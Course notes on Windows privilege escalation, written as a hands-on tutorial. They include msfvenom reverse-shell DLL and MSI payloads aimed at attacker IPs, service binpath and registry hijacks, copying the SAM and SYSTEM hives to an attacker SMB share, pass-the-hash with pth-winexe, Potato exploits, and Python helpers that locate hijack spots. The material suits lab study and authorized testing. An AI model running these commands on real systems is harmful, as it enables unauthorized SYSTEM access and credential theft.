Windows Privilege Escalation

Taking notes from Tib3rius's Windows Privilege Escalation course

Kernel Exploit

Finding and using a kernel exploit is usually a simple process:

  1. Enumerate the Windows version / patch level (systeminfo)

  2. Find matching exploits (Google, ExploitDB, GitHub)

  3. Compile and run

Beware though: kernel exploits are often unstable, may be one-shot, and can crash the system, so on a real engagement they should be a last resort and tried only with the client's agreement.

Tools

Windows Exploit Suggester (next generation, runs against systeminfo output):

https://github.com/bitsadmin/wesng

Precompiled kernel exploits (treat third-party binaries with care; inspect or rebuild them before running on a client system):

https://github.com/SecWiki/windows-kernel-exploits

Watson:

https://github.com/rasta-mouse/Watson

Service Exploits

Insecure Service Permissions

Use accesschk.exe to check the user account's permissions on the "daclsvc" service. The dangerous rights are SERVICE_CHANGE_CONFIG (change the binary path), SERVICE_START and SERVICE_STOP, or SERVICE_ALL_ACCESS:

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

Query the service and note that it runs as SYSTEM (SERVICE_START_NAME), then point its binary path at your reverse shell:

sc qc daclsvc

sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

Listen with netcat on your local machine and start the service. The start command will report a timeout, because reverse.exe never reports back to the Service Control Manager, but the shell is spawned as SYSTEM before that happens. Note the original BINARY_PATH_NAME from sc qc so you can restore it afterwards:

net start daclsvc

Unquoted Service Path

First, check that we have permission to start the service:

.\accesschk.exe /accepteula -ucqv user unquotedsvc

Second, check write permissions on each directory along the unquoted path (Windows tries each space-delimited prefix of the path as an executable before reaching the real one):

.\accesschk.exe /accepteula -uwdq C:\
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

Create the reverse.exe executable, copy it into this directory and rename it common.exe (the first word of the "Common Files" path component, with .exe appended, is what Windows tries to run first from that directory).

Listen with netcat on port 53 and start the service; the shell runs with SYSTEM privileges:

net start unquotedsvc
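An added example, not part of the original notes, showing why common.exe is the right filename: it reproduces the CreateProcess lookup for an unquoted command line (each space-delimited prefix is tried as the program, with .exe appended when the prefix has no extension) and then works out which of those candidates land in a directory we can write to. The ImagePath and the writable directory are constructed to match the lab service above; probe_writable_dirs is an assumed helper that tests write access by creating a temporary file, which you would run on the target itself.

```python
import ntpath
import tempfile
from typing import Iterable, List


def unquoted_path_candidates(image_path: str) -> List[str]:
    """Executables Windows tries, in order, for a service ImagePath.

    For an unquoted command line CreateProcess tries every space-delimited
    prefix as the program name and appends ".exe" when the prefix has no
    extension, stopping at the first file that exists. A quoted path is
    unambiguous and yields exactly one candidate.
    """
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return [image_path[1:image_path.index('"', 1)]]

    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if not ntpath.splitext(prefix)[1]:
            candidates.append(prefix + ".exe")
        else:
            candidates.append(prefix)
        # Once a prefix names the .exe, the remaining tokens are arguments.
        if prefix.lower().endswith(".exe"):
            break
    return candidates


def plantable_files(image_path: str, writable_dirs: Iterable[str]) -> List[str]:
    """Candidate paths an attacker could create, given writable directories.

    The final candidate is the intended executable and is excluded: replacing
    it is the 'insecure service executable' case, not unquoted-path hijacking.
    """
    writable = {ntpath.normpath(d).lower() for d in writable_dirs}
    candidates = unquoted_path_candidates(image_path)
    return [c for c in candidates[:-1]
            if ntpath.normpath(ntpath.dirname(c)).lower() in writable]


def probe_writable_dirs(candidates: Iterable[str]) -> List[str]:
    """On the target: try to create a file in each candidate's directory.

    A probe file is the only reliable write test; os.access(W_OK) on Windows
    ignores the DACL. Assumed helper, meant to be run on the Windows host.
    """
    writable = []
    for directory in {ntpath.dirname(c) for c in candidates}:
        try:
            with tempfile.NamedTemporaryFile(dir=directory, delete=True):
                writable.append(directory)
        except OSError:
            continue
    return writable


if __name__ == "__main__":
    # Constructed ImagePath matching the lab's "Unquoted Path Service".
    lab_path = (r"C:\Program Files\Unquoted Path Service\Common Files"
                r"\unquotedpathservice.exe")
    for c in unquoted_path_candidates(lab_path):
        print("Windows will try:", c)
    # Constructed: the service's own directory is assumed world-writable.
    print("Plant here:", plantable_files(lab_path, [r"C:\Program Files\Unquoted Path Service"]))
```

The list shows that "C:\Program Files\Unquoted Path.exe" is also tried, but its parent is C:\Program Files, which standard users cannot write to; the only plantable candidate is Common.exe in the service directory, which is exactly the file the notes tell you to create.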

Weak Registry Permissions

Query the "regsvc" service and note that it runs as SYSTEM (SERVICE_START_NAME):

sc qc regsvc

Using accesschk.exe, note that the registry key for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users):

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Check whether we can start the service:

.\accesschk.exe /accepteula -ucqv user regsvc

Overwrite the ImagePath value under the service key so it points at the reverse.exe executable you created (note the original value first so you can restore it):

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Listen with netcat on port 53 and start the service:

net start regsvc

Insecure Service Executables

Query the service, then check whether its executable is writable by everyone:

sc qc filepermsvc

Check with accesschk.exe whether we can start the service, and whether the executable itself is writable:

.\accesschk.exe /accepteula -ucqv user filepermsvc
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Create reverse.exe and replace filepermservice.exe with it.

Listen with netcat on port 53 and start the service; the reverse shell comes back as SYSTEM:

net start filepermsvc

In the real world, don't forget to back up the original file before overwriting it.

DLL Hijacking

Check whether the service runs as SYSTEM:

sc qc dllsvc

In the real world, copy the service executable to your own machine and run it under Procmon, filtering for "NAME NOT FOUND" results on CreateFile operations ending in .dll, to find which DLLs it tries to load that do not exist on the system.

Generate a reverse shell DLL with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f dll -o hijackme.dll

Find a directory in the DLL search order (the service's own directory, then the system directories, then each PATH entry) where the DLL is missing and which is writable by us, and copy the DLL there.

Listen with netcat, then stop the service and start it again so the DLL is loaded.
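An added example, not part of the original notes, that encodes the default DLL search order (SafeDllSearchMode on, which is the default) and answers the question Procmon leaves you with: given where the service lives, what PATH looks like, and which directories you can write to, where does a planted copy of the missing DLL actually get loaded? It also handles the case where the DLL does exist somewhere, in which only a writable directory searched before that location works. All directories, the PATH value and the DLL name are constructed sample input.

```python
import ntpath
from typing import Iterable, List, Optional


def dll_search_order(exe_dir: str,
                     system_root: str = r"C:\Windows",
                     cwd: Optional[str] = None,
                     path_env: Iterable[str] = ()) -> List[str]:
    """Directories the loader searches for an implicitly loaded DLL.

    Default order with SafeDllSearchMode enabled: the application directory,
    System32, the 16-bit System directory, the Windows directory, the current
    directory, then each PATH entry. KnownDLLs and DLLs requested by absolute
    path bypass this search entirely.
    """
    order = [
        exe_dir,
        ntpath.join(system_root, "System32"),
        ntpath.join(system_root, "System"),
        system_root,
    ]
    if cwd:
        order.append(cwd)
    order.extend(p for p in path_env if p)
    return [ntpath.normpath(d) for d in order]


def hijack_locations(dll_name: str,
                     search_order: Iterable[str],
                     writable_dirs: Iterable[str],
                     existing_in: Optional[str] = None) -> List[str]:
    """Paths where dropping dll_name gets it loaded by the service.

    If the DLL already exists in `existing_in`, only writable directories
    searched *before* it count; the loader stops at the first hit. A DLL that
    is missing everywhere can be planted in any writable searched directory.
    """
    writable = {ntpath.normpath(d).lower() for d in writable_dirs}
    stop = ntpath.normpath(existing_in).lower() if existing_in else None
    locations = []
    for directory in search_order:
        key = ntpath.normpath(directory).lower()
        if stop is not None and key == stop:
            break
        if key in writable:
            locations.append(ntpath.join(directory, dll_name))
    return locations


if __name__ == "__main__":
    # Constructed sample: service in Program Files, C:\Temp on PATH and writable.
    order = dll_search_order(
        r"C:\Program Files\DLL Hijack Service",
        path_env=r"C:\Windows\system32;C:\Windows;C:\Temp".split(";"),
    )
    print(hijack_locations("hijackme.dll", order, [r"C:\Temp"]))
```

Running this on the constructed input reports C:\Temp\hijackme.dll as the only usable location; the same call with existing_in set to C:\Windows\System32 returns nothing, which is why a DLL that Windows already finds in System32 cannot be hijacked from a PATH directory, and why Procmon's NAME NOT FOUND entries are the ones worth chasing.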

Registry

AutoRuns

To list the registry for AutoRun executables:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Using accesschk.exe, check whether one of the AutoRun executables is writable by everyone:

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

Copy the reverse.exe executable you created and overwrite the AutoRun executable with it:

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

Start a listener on your local machine and then restart the Windows VM. Open a new RDP session to trigger a reverse shell running with admin privileges; you should not have to authenticate, because the autorun fires when the admin user's session is created:

rdesktop 10.10.21.39

In the real world, don't forget to back up the original program you overwrite.

AlwaysInstallElevated

Query the registry for the AlwaysInstallElevated value. It has to be checked under both HKCU and HKLM (same subkey path, SOFTWARE\Policies\Microsoft\Windows\Installer):

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Both values must be set to 1 (0x1). If either is missing or 0, the exploit will not work.

On Linux, generate a reverse shell Windows Installer (reverse.msi) using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.18.145 LPORT=53 -f msi -o reverse.msi

Transfer reverse.msi to a directory on the Windows machine. Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:

msiexec /quiet /qn /i reverse.msi

Passwords

Registry

The registry can be searched for keys and values that contain the word "password":

reg query HKLM /f password /t REG_SZ /s

If you want to save some time, query this specific key to find admin AutoLogon credentials:

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

On Kali, use winexe to spawn a command prompt with the admin user's privileges (replace the password with the one you found):

winexe -U 'admin%password123' --system //10.10.140.4 cmd.exe

Saved Creds

List any saved credentials:

cmdkey /list

Note whether credentials for the "admin" user are saved. If they aren't, run the C:\PrivEsc\savecred.bat script to refresh the saved credentials. Start a listener on Kali and run reverse.exe with runas, using the admin user's saved credentials:

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Search For Configuration Files (run from the directory you want to search, e.g. C:\)

dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt

Security Account Manager (SAM)

The SAM and SYSTEM registry hives can be used to extract user password hashes. They are located in:

C:\Windows\System32\config. The files are locked while Windows is running, so they cannot be copied directly.

Backup copies may exist in the C:\Windows\Repair or C:\Windows\System32\config\RegBack directories.

Transfer the SAM and SYSTEM files to your Kali VM (here over an SMB share named "kali" hosted on Kali):

copy C:\Windows\Repair\SAM \\10.10.10.10\kali\
copy C:\Windows\Repair\SYSTEM \\10.10.10.10\kali\

You can dump the password hashes with creddump7 (the SYSTEM hive holds the boot key needed to decrypt the SAM; the script is Python 2):

git clone https://github.com/Neohapsis/creddump7.git
apt install python-crypto
python2 creddump7/pwdump.py SYSTEM SAM

Passing the Hash

Once you have the hashes you don't need to crack them; you can pass the hash to spawn a shell. Give pth-winexe the full LM:NT pair as printed by pwdump:

pth-winexe -U 'admin%hash' //10.10.10.42 cmd.exe
# add --system to get a shell as SYSTEM instead of the admin user

Scheduled Tasks

Windows can be configured to run tasks at specific times, periodically (e.g. every 5 minutes, like cron on Linux) or when triggered by some event (e.g. a user logon). A task runs with the privileges of the account it is configured for, so a writable script run by a privileged task is an escalation path.

Check the permissions on the script to see whether we can write to it:

.\accesschk.exe /accepteula -quv user CleanUp.ps1

Append a line that runs our reverse shell to the script, then listen with netcat; the shell comes back the next time the task runs:

echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Insecure GUI Apps

Open AdminPaint on your desktop and check which user it is running as:

tasklist /V | findstr mspaint.exe

When it is running as admin, click File > Open in the mspaint window, and in the filename box type:

file://c:/windows/system32/cmd.exe

Press Enter and a command prompt pops up with the same privileges as the GUI app.

Startup Apps

Each user can define apps that start when they log in by placing shortcuts to them in a specific directory.

Windows also has a startup directory for apps that should start for all users:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

If we can create files in this directory, we can drop a shortcut to our reverse shell there and escalate privileges when an admin logs in.

Check whether we have write access to the Startup directory:

.\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Run the C:\PrivEsc\CreateShortcut.vbs script, which creates a new shortcut to your reverse.exe in the StartUp directory:

cscript C:\PrivEsc\CreateShortcut.vbs

When the user logs out and logs back in as the admin user, the shortcut runs and connects to our listener.

Installed Apps

In Exploit-DB

Exploit-DB lists apps that are vulnerable to local privilege escalation; you only need to check whether a vulnerable version is installed or running on your machine, for example with:

tasklist /V

Hot Potato

Hot Potato is the name of an attack that uses a spoofing attack together with an NTLM relay attack to gain SYSTEM privileges. It tricks Windows into authenticating as the SYSTEM user to a fake HTTP server using NTLM. The NTLM credentials are then relayed to SMB in order to gain command execution.

This attack works on Windows 7, 8, early versions of Windows 10 and their server counterparts; it was fixed by MS16-075, so it will not work on patched systems.

.\potato.exe -ip 192.168.1.33 -cmd "C:\temp\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

Token Impersonation

Token impersonation is a technique you can use as local admin to impersonate another user logged on to the system. This is very useful when you are local admin on a machine and want to impersonate another logged-on user, e.g. a domain administrator. The privilege that matters is SeImpersonatePrivilege, which service accounts such as IIS or Jenkins often hold, as in the output below:

C:\Program Files (x86)\Jenkins>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled

In metasploit

meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

Juicy Potato

https://github.com/ohpe/juicy-potato

.\juicypotato.exe -l 1337 -p c:\temp\rev.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

You can find CLSIDs in the list published with the Juicy Potato repository; the CLSID must be valid for the version of Windows you are using. Juicy Potato needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, and does not work on Windows 10 1809 / Server 2019 and later.

Will be updated with more.
